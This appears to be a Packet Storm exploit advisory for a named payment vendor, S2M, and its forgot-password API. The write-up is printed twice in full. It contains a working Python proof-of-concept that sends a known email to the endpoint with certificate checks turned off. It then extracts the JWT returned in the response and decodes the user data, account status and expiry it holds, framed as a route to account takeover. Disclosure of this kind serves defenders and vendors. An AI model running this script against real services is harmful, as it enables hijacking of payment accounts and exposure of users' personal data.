Description
This Python script demonstrates a security assessment targeting a forgot-password API endpoint in a digital payment platform operated by S2M, a company specializing in secure electronic transactions and payment processing solutions. The script sends a...
Basic Information
ID
PACKETSTORM:220754
Published
May 11, 2026 at 00:00
Affected Product
Affected Versions
==================================================================================================================================
| # Title : S2M JWT Token Exposure API Forgot Password Endpoint Vulnerability |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits) |
| # Vendor : https://s2mworldwide.com/en/ |
==================================================================================================================================
[+] Summary : This Python script demonstrates a security assessment targeting a forgot-password API endpoint in a digital payment platform operated by S2M,
a company specializing in secure electronic transactions and payment processing solutions.
The script sends a crafted POST request using a known email address and attempts to retrieve a JWT (JSON Web Token) directly from the server response without proper verification.
[+] If successful, the script:
Extracts and displays the full JWT token
Decodes the token payload (base64)
Parses and prints sensitive information, including:
User-related data
Account status (userStatus)
Token expiration time (exp)
[+] Security Impact:
This behavior indicates a critical vulnerability in the authentication flow. If an attacker can obtain valid JWT tokens without proper identity verification, it may lead to:
[+] Account Takeover
Sensitive Information Disclosure
Weak Password Reset Mechanism
[+] POC :
import requests
import urllib3
import json
import base64
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
BASE_URL = "https://127.0.0.1/path/api/merchant/auth"
EMAIL = "[email protected]"
def decode_jwt_payload(token):
"Decode the middle part of the JWT to display the data"
try:
parts = token.split('.')
if len(parts) != 3:
return "Invalid token format"
payload = parts[1]
payload += '=' * (-len(payload) % 4)
decoded = base64.b64decode(payload).decode('utf-8')
return json.loads(decoded)
except Exception as e:
return f"Token content extraction failed: {e}"
def get_full_token():
session = requests.Session()
session.headers.update({
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36",
"Content-Type": "application/json"
})
try:
print(f"[*] Extracting full account token: {EMAIL}")
res = session.post(f"{BASE_URL}/forgot-password", json={"email": EMAIL}, verify=False)
data = res.json()
token = data.get('token')
status = data.get('userStatus')
if token:
print("\n" + "="*30 + " Full token (JWT) " + "="*30)
print(token)
print("="*81 + "\n")
print("[*] Token Content Parsing (Decoded Payload):")
payload_info = decode_jwt_payload(token)
print(json.dumps(payload_info, indent=4, ensure_ascii=False))
print(f"\n[!] Current User Status: {status}")
if 'exp' in payload_info:
from datetime import datetime
exp_date = datetime.fromtimestamp(payload_info['exp'])
print(f"[!] Token valid until: {exp_date}")
else:
print("[-] No token found in server response.")
print(f"[*] Full response: {data}")
except Exception as e:
print(f"[X] Error: {e}")
if __name__ == "__main__":
get_full_token()
Greetings to :==============================================================================
jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
============================================================================================
| # Title : S2M JWT Token Exposure API Forgot Password Endpoint Vulnerability |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits) |
| # Vendor : https://s2mworldwide.com/en/ |
==================================================================================================================================
[+] Summary : This Python script demonstrates a security assessment targeting a forgot-password API endpoint in a digital payment platform operated by S2M,
a company specializing in secure electronic transactions and payment processing solutions.
The script sends a crafted POST request using a known email address and attempts to retrieve a JWT (JSON Web Token) directly from the server response without proper verification.
[+] If successful, the script:
Extracts and displays the full JWT token
Decodes the token payload (base64)
Parses and prints sensitive information, including:
User-related data
Account status (userStatus)
Token expiration time (exp)
[+] Security Impact:
This behavior indicates a critical vulnerability in the authentication flow. If an attacker can obtain valid JWT tokens without proper identity verification, it may lead to:
[+] Account Takeover
Sensitive Information Disclosure
Weak Password Reset Mechanism
[+] POC :
import requests
import urllib3
import json
import base64
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
BASE_URL = "https://127.0.0.1/path/api/merchant/auth"
EMAIL = "[email protected]"
def decode_jwt_payload(token):
"Decode the middle part of the JWT to display the data"
try:
parts = token.split('.')
if len(parts) != 3:
return "Invalid token format"
payload = parts[1]
payload += '=' * (-len(payload) % 4)
decoded = base64.b64decode(payload).decode('utf-8')
return json.loads(decoded)
except Exception as e:
return f"Token content extraction failed: {e}"
def get_full_token():
session = requests.Session()
session.headers.update({
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36",
"Content-Type": "application/json"
})
try:
print(f"[*] Extracting full account token: {EMAIL}")
res = session.post(f"{BASE_URL}/forgot-password", json={"email": EMAIL}, verify=False)
data = res.json()
token = data.get('token')
status = data.get('userStatus')
if token:
print("\n" + "="*30 + " Full token (JWT) " + "="*30)
print(token)
print("="*81 + "\n")
print("[*] Token Content Parsing (Decoded Payload):")
payload_info = decode_jwt_payload(token)
print(json.dumps(payload_info, indent=4, ensure_ascii=False))
print(f"\n[!] Current User Status: {status}")
if 'exp' in payload_info:
from datetime import datetime
exp_date = datetime.fromtimestamp(payload_info['exp'])
print(f"[!] Token valid until: {exp_date}")
else:
print("[-] No token found in server response.")
print(f"[*] Full response: {data}")
except Exception as e:
print(f"[X] Error: {e}")
if __name__ == "__main__":
get_full_token()
Greetings to :==============================================================================
jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
============================================================================================